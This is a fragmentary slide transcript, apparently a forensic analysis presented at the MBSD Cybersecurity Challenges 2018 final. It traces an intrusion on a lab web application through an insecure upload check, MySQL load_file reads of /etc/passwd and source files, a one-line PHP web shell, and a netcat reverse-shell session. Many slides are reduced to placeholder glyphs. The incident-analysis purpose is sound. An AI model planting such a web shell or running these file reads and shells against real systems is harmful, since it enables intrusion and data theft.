MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

Transcript

1. MBSD Cybersecurity Challenges 2018

2. None
3. None

4. ▋ ▋ ▋ ▋ ▋ ▋

5. ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋

   ▋ ▋ ▋

6. ▋ ▋ ► ► ► ►

7. ▋ ► ► ► ► ▋ ► ► ►

8. None
9. None

10. sendmessage.php ▋ ▋ ▋ $prefix = md5(time() . $user->id); $tname

    = $prefix . basename($_FILES["file"]["name"]); if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {

11. sendmessage.php (2018/9/21 14:46:48) 180921 14:39:24 26247 Connect [email protected] on mysql

    180921 14:41:06 26247 Query select load_file('/etc/hosts') 180921 14:41:12 26247 Query select load_file('/etc/passwd') 180921 14:42:30 26247 Query select load_file('/etc/issue') 180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf') 180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php') 180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php') 180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php') 180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php') 180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php') 180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')

12. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </>

13. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

14. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1 [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1

15. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

16. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

17. (2018/9/21 15:29:02) $ nc –lvp 4444 192.168.11.2 </>

18. (2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…

19. (2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…

20. (2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on

    [0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$

21. (2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on

    [0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$ 192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
22. None

23. ▋ ▋ ▋

24. ▋ ▋ ▋ POST

25. ▋ ▋ ▋ POST POST

26. ( ) ▋ ► ►

27. POST ▋ ► ►

28. None

29. 38

30. ▋ ▋ ▋ ▋ ▋ ▋ ▋

31. ▋ ▋ ▋ ▋ ▋ ▋ ▋

32. ▋ ► ▋ ► ▋ ►

33. ▋ ▋

34. ▋ ► ► ►

35. None